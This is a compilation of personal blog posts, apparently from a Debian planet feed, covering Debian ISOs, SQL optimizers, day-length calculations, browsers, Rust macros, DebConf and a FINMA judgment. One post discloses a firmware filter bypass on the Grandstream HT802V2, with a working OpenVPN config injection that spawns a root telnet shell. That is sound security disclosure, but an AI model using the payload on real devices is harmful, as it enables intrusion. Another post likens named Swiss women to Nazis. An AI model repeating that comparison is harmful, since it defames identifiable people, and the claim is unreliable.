But the FAIme web service of my FAI project can build a custom installation image using the backports kernel. Choose a desktop environment, a language and add some packages names if you like. Then select Debian 12 bookworm and then enable backports repository including newer kernel. After a short time you can download your own installation image.
Usually you should not use older releases for a new installation. In our archive the folder https://cdimage.debian.org/cdimage/archive/ contains 6163 ISO files starting from Debian 3.0 (first release was in 2002) and including every point release.
The full DVD image for the oldstable release (Debian 11.11.0 including non-free firmware) is here
the smaller netinst image is
https://cdimage.debian.org/cdimage/archive/11.10.0/amd64/iso-cd/debian-11.10.0-amd64-netinst.iso
The oldest ISO I could find is from 1999, using kernel 2.0.36.
I still hadn't managed to boot it in KVM.
UPDATE: I got a kernel panic because the VM had 4GB RAM. Reducing this to 500MB RAM (even 8MB works) started the installer of Debian 2.1 without any problems.
In this post we still did not cover the ports folder (for the not officially supported, older hardware architectures), which contains around 760 ISO files, nor the unofficial folder (1445 ISO files), which in the past also provided the ISOs that included the non-free firmware blobs.
Then there are more than 34,000 cloud images. But hey, no ISO files are involved there. That may become part of a completely new posting.
Norvald Ryeng, my old manager, held a talk on the MySQL hypergraph optimizer (which was my main project before I left a couple of years ago) at a pre-FOSDEM event; it's pretty interesting if you want to know the basics of how an SQL join optimizer works.
The talk doesn't go very deep into the specifics of the hypergraph optimizer, but in a sense, that's the point; an optimizer isn't characterized by one unique trick that fixes everything, it's about having a solid foundation and then iterating on that a lot. Perhaps 80% of the talk could just as well have been about any other System R-derived optimizer, and that's really a feature in itself.
I remember that perhaps the most satisfying property during development was when things we hadn't even thought of integrated smoothly; say, when we added support for planning windowing functions and the planner just started pushing down the required sorts (i.e., interesting orders) almost by itself. (This is very unlike the old MySQL optimizer, where pretty much everything needed to think of everything else, or else risk stepping on each others' toes.)
Apart from that, I honestly don't know how far it is from being a reasonable default :-) I guess try it and see, if you're using MySQL?
We're way past the winter solstice, and approaching the equinox. The sun is noticeably staying up later and later every day, which raises an obvious question: when are the days getting longer the fastest? Intuitively I want to say it should happen at the equinox. But does it happen exactly at the equinox? I could read up on all the gory details of this, or I could just make some plots. I wrote this:
#!/usr/bin/python3

import sys
import datetime
import astral.sun

lat  = 34.
year = 2025

city = astral.LocationInfo(latitude=lat, longitude=0)
date0 = datetime.datetime(year, 1, 1)

print("# date sunrise sunset length_min")
for i in range(365):
    date = date0 + datetime.timedelta(days=i)
    s = astral.sun.sun(city.observer, date=date)
    date_sunrise = s['sunrise']
    date_sunset  = s['sunset']

    date_string    = date.strftime('%Y-%m-%d')
    sunrise_string = date_sunrise.strftime('%H:%M')
    sunset_string  = date_sunset.strftime('%H:%M')
    print(f"{date_string} {sunrise_string} {sunset_string} {(date_sunset-date_sunrise).total_seconds()/60}")
This computes the sunrise and sunset time for every day of 2025 at a latitude of 34 degrees (i.e. Los Angeles), and writes out a log file (using the vnlog format).
Let's plot it:
< sunrise-sunset.vnl \
    vnl-filter -p date,l='length_min/60' \
  | feedgnuplot \
      --set 'format x "%b %d"' \
      --domain \
      --timefmt '%Y-%m-%d' \
      --lines \
      --ylabel 'Day length (hours)' \
      --hardcopy day-length.svg
Well that makes sense. When are the days the longest/shortest?
$ < sunrise-sunset.vnl vnl-sort -grk length_min | head -n2 | vnl-align
# date     sunrise sunset length_min
2025-06-21 04:49   19:14  864.8543702000001

$ < sunrise-sunset.vnl vnl-sort -gk length_min | head -n2 | vnl-align
# date     sunrise sunset length_min
2025-12-21 07:01   16:54  592.8354265166668
Those are the solstices, as expected. Now let's look at the time gained/lost each day:
$ < sunrise-sunset.vnl \
    vnl-filter -p date,d='diff(length_min)' \
  | vnl-filter --has d \
  | feedgnuplot \
      --set 'format x "%b %d"' \
      --domain \
      --timefmt '%Y-%m-%d' \
      --lines \
      --ylabel 'Daytime gained from the previous day (min)' \
      --hardcopy gain.svg
Looks vaguely sinusoidal, like the last plot. And it looks like we gain/lose at most ~2 minutes each day. When does the gain peak?
$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' |
    vnl-filter --has d | vnl-sort -grk d | head -n2 | vnl-align
# date     d
2025-03-19 2.13167

$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' |
    vnl-filter --has d | vnl-sort -gk d | head -n2 | vnl-align
# date     d
2025-09-25 -2.09886
Not at the equinoxes! The fastest gain is a few days before the equinox and the fastest loss a few days after.
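Out of curiosity, here is a stdlib-only cross-check (no astral needed) using the textbook sunrise equation with a simple cosine approximation for the solar declination. In this idealized, symmetric model the fastest gain lands essentially on the day the declination crosses zero, which hints that the few-day offsets measured above come from effects the simple formula ignores (e.g. the Earth's elliptical orbit). The function and constants below are my own sketch, not from the script above:

```python
import math

def day_length_hours(day_of_year: int, lat_deg: float = 34.0) -> float:
    """Approximate daylight hours from the standard sunrise equation."""
    # Simple cosine approximation of solar declination, in degrees.
    decl = -23.44 * math.cos(math.radians(360.0 / 365.0 * (day_of_year + 10)))
    lat = math.radians(lat_deg)
    d = math.radians(decl)
    # Sunrise equation: cos(hour angle at sunrise) = -tan(lat) * tan(decl);
    # clamp for polar day/night at high latitudes.
    cos_h = max(-1.0, min(1.0, -math.tan(lat) * math.tan(d)))
    # 15 degrees of hour angle per hour; sunrise-to-sunset spans 2*h.
    return 2.0 * math.degrees(math.acos(cos_h)) / 15.0

lengths = [day_length_hours(n) for n in range(1, 366)]
gains = [(day, lengths[day - 1] - lengths[day - 2]) for day in range(2, 366)]
longest = max(range(1, 366), key=lambda day: lengths[day - 1])
fastest = max(gains, key=lambda t: t[1])
print(f"longest day-of-year: {longest}")
print(f"fastest gain: day {fastest[0]}, {fastest[1] * 60:.2f} min/day")
```

The longest day comes out near the June solstice and the fastest gain right around the March equinox, with a peak rate close to the ~2.1 min/day measured above.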
18 February, 2025 06:47PM by Dima Kogan
It is a shocking fact but ten percent of the guards in Nazi concentration camps were women.
Happy Valentine's Day
The Conversation is one of many publishers to write a feature article about these sadistic women.
When we see nazis in the news or in the movies, we typically see pictures of the male leaders and their male soldiers.
In 1957, American engineer Russell Ryan met Braunsteiner while holidaying in Austria. She did not tell him about her past. They fell in love, married and moved to New York, where they lived quiet lives until she was tracked down by Nazi hunter Simon Wiesenthal. Russell could not believe she had been a Nazi concentration camp guard. His wife, he said, “would not hurt a fly”.
The BBC web site has their own article about women torturing Nazi victims.
The fascist regime promoted a world-view of women in traditional mothering roles. Many German women were able to use this philosophy as an opportunity to deny any personal involvement in the Holocaust and most claimed they didn't even know it was happening.
Nonetheless, given that so many women were in fact willing to work in the concentration camps, should we be more skeptical of those German women who claim they knew nothing?
News has recently emerged about young women in Switzerland today openly wearing the swastika tattoo and performing the Nazi salute.
Multiple Swiss women including Caroline Kuhnlein-Hofmann and Melanie Bron in Vaud and Pascale Köster and Albane die Ziegler at Walder Wyss in Zurich signed a document about excluding foreign software developers and obfuscating who really did the work. This is totally analogous to the behavior of the Nazis who plagiarised the work of Jewish authors in textbooks.
Here is another photo from Polymanga 2023 in Montreux, the young Swiss woman is sitting on the edge of Lake Geneva. The lake is the border with France.
I've just passed my 10th anniversary of starting at Red Hat! As a personal milestone, this is the longest I've stayed in a job: I managed 10 years at Newcastle University, although not in one continuous role.
I haven't exactly worked in one continuous role at Red Hat either, but it feels like what I do today is a logical evolution from what I started doing, whereas in Newcastle I jumped around a bit.
I've seen some changes: in my time here, we changed the logo from Shadow Man; we transitioned to using Google Workspace for lots of stuff, instead of in-house IT; we got bought by IBM; we changed President and CEO, twice. And millions of smaller things.
I won't reach an 11th: my Organisation in Red Hat is moving to IBM. I think this is sad news for Red Hat: they're losing some great people. But I'm optimistic for the future of my Organisation.
Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn’t an option and Chromium still has some of the Google anti-features built in.
So I tried to use Firefox for the things I do. One feature of Chrome-based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to restore it, but I prefer to have a minimal number of addons and not have any that exist just to replace deliberately broken settings in the browser. Also those addons can’t set a file for the URL; I could point them at a web server, but it’s annoying to have to set up a web server to work around a browser limitation.
Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There’s a Firefox setting for allowing web sites to autoplay but there doesn’t seem to be a way to add sites to the list.
Firefox is getting vertical tabs which is a really nice feature for wide displays [3].
Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust which is difficult to package and run [4]. There are Docker images for it but I prefer to avoid Docker, generally I think that Docker is a sign of failure in software development. If you can’t develop software that can be deployed without Docker then you aren’t developing it well.
The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it’s not included in Debian. Some of the changes like “replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk” are things that could be considered controversial. It definitely isn’t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser.
The Falkon browser that is part of the KDE project looks good, but QtWebEngine doesn’t have security support in Debian. Would it be possible to provide security support for it?
Ungoogled Chromium is available in Flatpak, so I’ll test that out. But ideally it would be packaged for Debian. I’ll try building a package of it and see how that goes.
The Iridium Browser is another option [6], it seems similar in design to Ungoogled-Chromium but by different people.
13 February, 2025 11:04AM by etbe
Last November, the DebConf25 Team asked the community to help design the logo for the 25th Debian Developers' Conference and the results are in! The logo contest received 23 submissions and we thank all the 295 people who took the time to participate in the survey. There were several amazing proposals, so choosing was not easy.
We are pleased to announce that the winner of the logo survey is 'Tower with red Debian Swirl originating from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0.
Juliana also shared with us a bit of her motivation, creative process and inspiration when designing her logo:
The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!
Congratulations, Juliana, and thank you very much for your contribution to Debian!
The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC.
Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website.
See you in Brest!
13 February, 2025 09:00AM by Donald Norwood, Santiago Ruano Rincón, Jean–Pierre Giraud
I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.
Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn
did
echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}
After the fix it does
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
  | sed -e '/script-security/d' \
        -e '/^[ ]*down /d' \
        -e '/^[ ]*up /d' \
        -e '/^[ ]*learn-address /d' \
        -e '/^[ ]*tls-verify /d' \
        -e '/^[ ]*client-[dis]*connect /d' \
        -e '/^[ ]*route-up/d' \
        -e '/^[ ]*route-pre-down /d' \
        -e '/^[ ]*auth-user-pass-verify /d' \
        -e '/^[ ]*ipchange /d' >> ${CONF_FILE}
That means it deletes all lines that either contain script-security
or start with a set of options that allow command execution.
Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf
), it already uses up
and therefore sets script-security 2
, so injecting that is unnecessary.
Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
in one of the command-executing options, a reverse shell will be opened.
The filtering looks for lines that start with zero or more spaces, followed by the option name (up
, down
, etc.), followed by another space.
While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config
.
However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names.
That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn
won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
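The bypass is easy to reproduce in isolation. This little Python sketch translates the relevant sed delete-patterns from the 1.0.3.5 filter into Python regexes (only a subset, for illustration) and shows that quoting the option name slips past them:

```python
import re

# A subset of the delete-patterns from the 1.0.3.5 filter, translated
# from sed ('/.../d') into Python regular expressions.
filters = [
    re.compile(r"script-security"),   # substring match anywhere
    re.compile(r"^[ ]*up "),          # option name at line start
    re.compile(r"^[ ]*down "),
]

def survives_filter(line: str) -> bool:
    """True if the firmware's sed filter would keep (not delete) the line."""
    return not any(f.search(line) for f in filters)

plain  = "up \"/bin/ash -c 'telnetd -l /bin/sh -p 1271'\""
quoted = "\"up\" \"/bin/ash -c 'telnetd -l /bin/sh -p 1271'\""

print(survives_filter(plain))   # False: the unquoted form is deleted
print(survives_filter(quoted))  # True: the quoted form gets through
```

The leading double quote means the line no longer starts with `up `, so none of the anchored patterns match, yet OpenVPN still parses it as the up option.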
/etc/rc.d/init.d/openvpn
looks very similar, according to firmware dumps.
After disclosing this issue to Grandstream, they issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
  | sed -e '/script-security/d' \
        -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}
So far I was unable to inject any further commands in this block.
12 February, 2025 04:58PM by evgeni
I'm going to FOSDEM 2025!
As usual, I'll be in the Java Devroom for most of that day, which this time around is Saturday.
Please recommend me any talks!
This is my shortlist so far:
derive-deftly 1.0 is released.
derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too!
Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules
; and its convenience and simplicity, compared to proc macros.
Programmers coming to Rust from scripting languages will appreciate derive-deftly’s convenient automatic code generation, which works as a kind of compile-time introspection.
I’m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.
Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.
(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs
; and, multiple module inclusion via #[path=]
. These are beyond the scope of this blog post.)
macro_rules!
macro_rules!
aka “pattern macros”, “declarative macros”, or sometimes “macros by example” are the simpler kind of Rust macro.
They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)]
macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:
macro_rules!
’s pattern language doesn’t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules
lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there’s a horrible technique as a workaround.)
And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }
. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.
Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.
macro_rules
also has various other weird deficiencies too specific to list here.
Overall, compared to (say) the C preprocessor, it’s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.
Rust’s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro’s implementation is Rust code, which takes the macro’s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.
This approach is more similar to Common Lisp’s macros than to most other programming languages’ macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]
. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like `#[derive(Debug)]` and `Clone`, and for important libraries like `serde` and `strum`.
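As a rough illustration (hand-written here, not the compiler's actual expansion), `#[derive(Debug)]` and `#[derive(Clone)]` on a small struct generate impls broadly equivalent to these:

```rust
struct Point { x: f64, y: f64 }

// Roughly what #[derive(Debug)] produces: format the struct name and
// each field via the Formatter's debug_struct builder.
impl std::fmt::Debug for Point {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("Point")
            .field("x", &self.x)
            .field("y", &self.y)
            .finish()
    }
}

// Roughly what #[derive(Clone)] produces: clone each field in turn.
impl Clone for Point {
    fn clone(&self) -> Self {
        Point { x: self.x, y: self.y }
    }
}

fn main() {
    let p = Point { x: 1.0, y: 2.0 };
    let q = p.clone();
    assert_eq!(format!("{:?}", p), "Point { x: 1.0, y: 2.0 }");
    assert_eq!(q.y, 2.0);
}
```

The point of the derive mechanism is that a proc macro writes this boilerplate for you, for every struct, from the tokens of the struct definition itself.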
But, it is a complete pain in the backside to write and maintain a proc_macro.
The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust’s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.
There are build/execution environment problems. The proc_macro code can’t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can’t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.
derive-deftly lets you write a `#[derive(...)]` macro, driven by a data structure, without wading into any of that stuff. Your macro definition is a template in a simple syntax, with predefined `$`-substitutions for the various parts of the input data structure.
Here’s a real-world example from a personal project:
```rust
define_derive_deftly! {
    export UpdateWorkerReport:

    impl $ttype {
        pub fn update_worker_report(&self, wr: &mut WorkerReport) {
            $(
                ${when fmeta(worker_report)}
                wr.$fname = Some(self.$fname.clone()).into();
            )
        }
    }
}
```
```rust
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow {
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
}
```
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
```rust
pub fn update_worker_report(&self, wr: &mut WorkerReport) {
    wr.status = Some(self.status.clone()).into();
    wr.info = Some(self.status.clone()).into();
}
```
Spot the mistake? We copy `status` to `info`. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.
Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose `#[derive(...)]` macros.
The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.
Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)
In my most recent personal Rust project, I have 22 bespoke derive macros, done with derive-deftly, and 19 macro_rules macros.
derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.
derive-deftly is already highly capable, and can solve many advanced problems.
It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide.
But declaring it 1.0 doesn’t mean that it won’t improve further.
Our ticket tracker has a laundry list of possible features. We'll sometimes be cautious about committing to these, so we've added a `beta` feature flag for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.
11 February, 2025 10:20AM by Adnan Hodzic
20 years ago, I got my Debian Developer account. I was 18 at the time, it was Shrove Tuesday and - as is customary - I was drunk when I got the email. There was so much that I did not know - which is also why the process took 1.5 years from the time I applied. I mostly only maintained a package or two. I'm still amazed that Christian Perrier and Joerg Jaspert put sufficient trust in me at that time. Nevertheless, now feels like a good time for a personal reflection on my involvement in Debian.
During my studies I took on more things. In January 2008 I joined the Release
Team as an assistant, which taught me a lot of code review. I have been an Application Manager on the side.
Going to my first Debconf was really a turning point. My first one was Mar del Plata in Argentina in August 2008, when I was 21. That was quite exciting, traveling that far from Germany for the first time. The personal connections I made there made quite the difference. It was also a big boost for motivation. I attended 8 (Argentina), 9 (Spain), 10 (New York), 11 (Bosnia and Herzegovina), 12 (Nicaragua), 13 (Switzerland), 14 (Portland), 15 (Germany), 16 (South Africa), and hopefully I'll make it to this year's in Brest. At all of them I did not see much of the countries, as I prioritized spending my time on Debian, even skipping some of the day trips in favor of team meetings. Yet I am very grateful to the project (and to my employer) for shipping me there.
I ended up as Stable Release Manager for a while, from August 2008 - when Martin Zobel-Helas moved into DSA - until I got dropped in March 2020. I think my biggest achievements were pushing for the creation of -updates in favor of a separate volatile archive and a change of the update policy to allow for more common sense updates in the main archive vs. the very strict "breakage or security" policy we had previously. I definitely need to call out Adam D. Barratt for being the partner in crime, holding up the fort for even longer.
In 2009 I got too annoyed at the existing wanna-build team not being responsive anymore and pushed for the system to be given to a new team. I did not build it and significant contributions were done by other people (like Andreas Barth and Joachim Breitner, and later Aurelien Jarno). I mostly reworked the way the system was triggered, investigated when it broke and was around when people wanted things merged.
In the meantime I worked sys/netadmin jobs while at university, both paid and as a volunteer with the students' council. For a year or two I was the administrator of a System z mainframe IBM donated to my university. We had a mainframe course and I attended two related conferences. That's where my s390(x) interest came from, although credit for the port needs to go to Aurelien Jarno.
Since completing university in 2013 I have been working for a company for almost 12 years. Debian experience was very relevant to the job and I went on maintaining a Linux distro or two at work - before venturing off into security hardening. People in megacorps - in my humble opinion - disappear from the volunteer projects because a) they might previously have been studying and thus had a lot more time on their hands and b) the job is too similar to the volunteer work and thus the same brain cells used for work are exhausted and can't be easily reused for volunteer work. I kept maintaining a couple of things (buildds, some packages) - mostly because of a sense of commitment and responsibility, but otherwise kind of scaled down my involvement. I also felt less connected as I dropped off IRC.
Last year I finally made it to Debian events again: MiniDebconf in Berlin, where we discussed the aftermath of the xz incident, and the Debian BSP in Salzburg. I rejoined IRC using the Matrix bridge. That also rekindled my involvement, with me guiding a new DD through NM and ending up in DSA. To be honest, only in the last two or three years I felt like a (more) mature old-timer.
I have a new gig at work lined up to start soon and next to that I have sysadmining for Debian. It is pretty motivating to me that I can just get things done - something that is much harder to achieve at work due to organizational complexities. It balances out some frustration I'd otherwise have. The work is different enough to be enjoyable and the people I work with are great.
I still think the work we do in Debian is important, as much as I see a lack of appreciation in a world full of containers. We are reaping most of the benefits of standing on the shoulders of giants and of great decisions made in the past (e.g. the excellent Debian policy, but also the organizational model) that made Debian what it is today.
Given the increase in size and complexity of what Debian ships - and the somewhat dwindling resource of developer time - it would benefit us to have better processes for large-scale changes across all packages. I greatly respect the horizontal efforts that are currently being driven, which suck up a lot of energy.
A lot of our infrastructure is also aging and not super well maintained. Many take it for granted that the services we have keep existing, but most are only maintained by a person or two, if even. Software stacks are aging and it is even a struggle to have all necessary packages in the next release.
Hopefully I can contribute a bit or two to these efforts in the future.
10 February, 2025 11:12AM by Philipp Kern (noreply@blogger.com)
In September 2023, Gaelle Jeanmonod at FINMA published a summary of the judgment against Parreaux, Thiébaud & Partners and their successor Justicia SA.
Madame Jeanmonod redacted the name of the company, the dates and other key details. We have recreated the unredacted judgment.
Many paragraphs are missing. The document released by Madame Jeanmonod only includes paragraphs 55 to 65 and paragraph 69.
Some entire sentences appear to be missing and replaced with the symbol (...).
Details about the original publication on the FINMA site.
Key to symbols:
| Symbol | Meaning |
|---|---|
| PTP | Parreaux, Thiébaud & Partners |
| A | Mathieu Parreaux |
| X | Parreaux, Thiébaud & Partners |
| Y | Justicia SA |
Important: we recommend reading this together with the full chronological history published in the original blog post by Daniel Pocock.
Provision of insurance services without authorisation

Judgment of the financial markets regulator FINMA, 2023
Summary
Following numerous reports that Parreaux, Thiébaud & Partners was operating an insurance business without authorisation, FINMA conducted investigations that led to the opening of enforcement proceedings. In fact, Parreaux, Thiébaud & Partners offered legal subscriptions for companies and individuals, which provided unlimited access to various legal services for an annual fee. In addition, Parreaux, Thiébaud & Partners also financed, in certain situations, advances on costs to pay lawyers' and court fees in the form of a loan at a 0% interest rate. According to its general terms and conditions, Parreaux, Thiébaud & Partners then obtained reimbursement of this loan from the legal costs to be received at the end of the proceedings in the event of victory. In the event of loss, the balance constituted a non-repayable loan. With regard to the areas of law that were partially covered and to disputes prior to the signing of the contract, the claim was partially covered at 50%.
During the procedure, FINMA appointed an investigation officer within Parreaux, Thiébaud & Partners. While the investigation officer's work had already begun, the activities of Parreaux, Thiébaud & Partners were taken over by Justicia SA in [late 2021 or early 2022]. From that point on, Parreaux, Thiébaud & Partners ceased its activities for new clients. Clients who had taken out a subscription with Parreaux, Thiébaud & Partners prior to the month of (…) were informed when renewing their subscription that their subscription had been transferred to Justicia SA. FINMA then extended the procedure and the mandate of the investigation officer to the latter. The business model of Justicia SA is almost identical to that of Parreaux, Thiébaud & Partners. The main difference concerns the terms of repayment of the loan which, according to the general terms and conditions of Justicia SA, was also repayable in the event of defeat according to the "terms agreed between the parties".
The report of the investigating officer contains in particular a detailed analysis of the activity of the two companies as well as a sample examination of client files.
By decision of [April?] 2023, FINMA held that the conditions set by case law to qualify an insurance activity were met and therefore found that Parreaux, Thiébaud & Partners, Justicia SA as well as Mathieu Parreaux, managing partner of Parreaux, Thiébaud & Partners and director of Justicia SA, carried out an insurance activity without having the required authorisation.
FINMA then found that Parreaux, Thiébaud & Partners, Justicia SA and Mathieu Parreaux had carried out insurance activities without the necessary authorisation, appointed a liquidator and ordered the immediate liquidation of the two companies. FINMA also ordered the confiscation of the liquidation proceeds in favour of the Confederation, ordered Mathieu Parreaux to refrain from carrying out, without the necessary authorisation, any activity subject to authorisation under the financial market laws and published the order to refrain for a period of 2 years on its website.
Key points from the judgment
(…)
1. Engaging in insurance transactions without the right to do so
(55) The LSA is intended in particular to protect policyholders against the risks of insolvency of insurance companies and against abuse [2]. Insurance companies established in Switzerland that carry out direct insurance or reinsurance activities must first obtain authorisation from FINMA and are subject to its supervision [3]. Where special circumstances justify it, FINMA may release from supervision an insurance company for which the insurance activity is of little economic importance or only affects a limited circle of policyholders [4].
(56) In accordance with Art. 2 para. 4 LSA, it is up to the Federal Council to define the activity in Switzerland in the field of insurance. In an ordinance dated 9 November 2005, the Federal Council clarified that, regardless of the method and place of conclusion of the contract, there is an insurance activity in Switzerland when a natural or legal person domiciled in Switzerland is the policyholder or insured [5]. Furthermore, the LSA applies to all insurance activities of Swiss insurance companies, both for insurance activities in Switzerland and abroad. Thus, even insurance contracts concluded from Switzerland but which relate exclusively to risks located abroad with policyholders domiciled abroad are subject to the LSA. In such cases, there may also be concurrent foreign supervisory jurisdiction at the policyholder's domicile [6].
(57) Since the legislature did not define the concept of insurance, the Federal Court developed five cumulative criteria to define it [7]: the existence of a risk, the service provided by the policyholder consisting of the payment of a premium, the insurance service, the autonomous nature of the transaction and the compensation of risks on the basis of statistical data. It is appropriate to examine below whether the services provided by Parreaux, Thiébaud & Partners and Justicia SA respectively meet the criteria of the given definition of the insurance activity.
(58) The existence of a risk: this is the central element for the qualification of insurance. The object of an insurance is always a risk or a danger, i.e. an event whose occurrence is possible but uncertain. The risk or its financial consequences are transferred from the insured to the insurer [8]. The uncertainty assumed by the insurer typically consists of determining whether and when the event that triggers the obligation to pay benefits occurs. The uncertainty can also result from the consequences of an event (already certain) [9]. In a judgment of 21 January 2011, the Federal Court, for example, acknowledged that the rental guarantee insurer who undertakes to pay the lessor the amount of the rental guarantee in place of the tenant while reserving the right to take action against the latter to obtain reimbursement of the amount paid, bears the risk of the tenant's insolvency. Thus, the risk of non-payment by the tenant is sufficient in itself to qualify this risk as an insurance risk [10].
